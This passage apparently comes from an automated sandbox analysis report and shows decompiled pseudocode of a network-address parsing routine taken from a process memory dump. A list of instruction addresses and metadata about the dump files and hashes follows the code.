								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0237EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0237685D(_t167, 4) == 0) {
								if(E0237685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0237685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0237685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02358980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0234DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0237EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0237EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                        0x0237fcd1
                                                                                                                                                        0x0237fcd6
                                                                                                                                                        0x0237fcd9
                                                                                                                                                        0x0237fcdc
                                                                                                                                                        0x0237fcdf
                                                                                                                                                        0x0237fce2
                                                                                                                                                        0x0237fce5
                                                                                                                                                        0x0237fce8
                                                                                                                                                        0x0237fceb
                                                                                                                                                        0x0237fced
                                                                                                                                                        0x0237fced
                                                                                                                                                        0x0237fcf3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fcfc
                                                                                                                                                        0x0237fcfe
                                                                                                                                                        0x0237fdc1
                                                                                                                                                        0x023aecbd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeccc
                                                                                                                                                        0x023aeccc
                                                                                                                                                        0x023aecd2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aecdf
                                                                                                                                                        0x023aece0
                                                                                                                                                        0x023aece4
                                                                                                                                                        0x023aeceb
                                                                                                                                                        0x023aecee
                                                                                                                                                        0x023aeca8
                                                                                                                                                        0x023aeca8
                                                                                                                                                        0x023aecaa
                                                                                                                                                        0x0237fd76
                                                                                                                                                        0x0237fd79
                                                                                                                                                        0x0237fdb4
                                                                                                                                                        0x0237fdb5
                                                                                                                                                        0x0237fdb6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fdb6
                                                                                                                                                        0x0237fd7e
                                                                                                                                                        0x023aecfc
                                                                                                                                                        0x0237fe2f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fe2f
                                                                                                                                                        0x023aed08
                                                                                                                                                        0x023aed0f
                                                                                                                                                        0x023aed17
                                                                                                                                                        0x023aed1b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aed1b
                                                                                                                                                        0x0237fd88
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fd94
                                                                                                                                                        0x0237fd99
                                                                                                                                                        0x0237fda1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fdb0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fdb0
                                                                                                                                                        0x023aecbd
                                                                                                                                                        0x0237fdc7
                                                                                                                                                        0x0237fdcb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fdd7
                                                                                                                                                        0x0237fde3
                                                                                                                                                        0x0237fe06
                                                                                                                                                        0x02391fe7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02391fef
                                                                                                                                                        0x02391ff0
                                                                                                                                                        0x02391ff4
                                                                                                                                                        0x02391ff7
                                                                                                                                                        0x02391ffa
                                                                                                                                                        0x02391ffd
                                                                                                                                                        0x02392000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aecf1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aecf1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fe06
                                                                                                                                                        0x0237fde8
                                                                                                                                                        0x0237fdec
                                                                                                                                                        0x0237fdef
                                                                                                                                                        0x0237fdf2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fdf2
                                                                                                                                                        0x0237fdcb
                                                                                                                                                        0x0237fd04
                                                                                                                                                        0x0237fd05
                                                                                                                                                        0x023aec67
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aec6f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aec6f
                                                                                                                                                        0x0237fd13
                                                                                                                                                        0x0237fd3c
                                                                                                                                                        0x0237fd40
                                                                                                                                                        0x023aec75
                                                                                                                                                        0x023aec7a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aec8a
                                                                                                                                                        0x023aec8a
                                                                                                                                                        0x023aec90
                                                                                                                                                        0x023aecb2
                                                                                                                                                        0x0237fd73
                                                                                                                                                        0x0237fd73
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fd73
                                                                                                                                                        0x023aec95
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeca1
                                                                                                                                                        0x023aeca4
                                                                                                                                                        0x023aeca5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeca5
                                                                                                                                                        0x023aec7a
                                                                                                                                                        0x0237fd4a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fd6e
                                                                                                                                                        0x0237fd6e
                                                                                                                                                        0x0237fd71
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fd71
                                                                                                                                                        0x0237fd4a
                                                                                                                                                        0x0237fd21
                                                                                                                                                        0x0238a3a1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0238a3a1
                                                                                                                                                        0x0237fd36
                                                                                                                                                        0x0239200b
                                                                                                                                                        0x02392012
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02392018
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02392018
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0237fd36
                                                                                                                                                        0x0237fe0f
                                                                                                                                                        0x0237fe16
                                                                                                                                                        0x0238a3ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0238a3b3
                                                                                                                                                        0x0238a3b3
                                                                                                                                                        0x0237fe1f
                                                                                                                                                        0x023aed25
                                                                                                                                                        0x023aed86
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aed91
                                                                                                                                                        0x023aed95
                                                                                                                                                        0x023aed95
                                                                                                                                                        0x023aed9a
                                                                                                                                                        0x023aedad
                                                                                                                                                        0x023aedb3
                                                                                                                                                        0x023aedba
                                                                                                                                                        0x023aedc4
                                                                                                                                                        0x023aedc9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aedcc
                                                                                                                                                        0x023aed2a
                                                                                                                                                        0x023aed55
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aed61
                                                                                                                                                        0x023aed66
                                                                                                                                                        0x023aed6e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aed7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aed7d
                                                                                                                                                        0x023aed30
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aed3c
                                                                                                                                                        0x023aed43
                                                                                                                                                        0x023aed4b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3965848254-0
                                                                                                                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction ID: 52600a615ae28d9db929aff25741209df9ffedcf5766315f957be73e03fc1d7f
                                                                                                                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction Fuzzy Hash: 6B918C31D0020AEFDF34DFA8C8457AEB7B4FF45708F20847AD415A6A52E7389A81CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%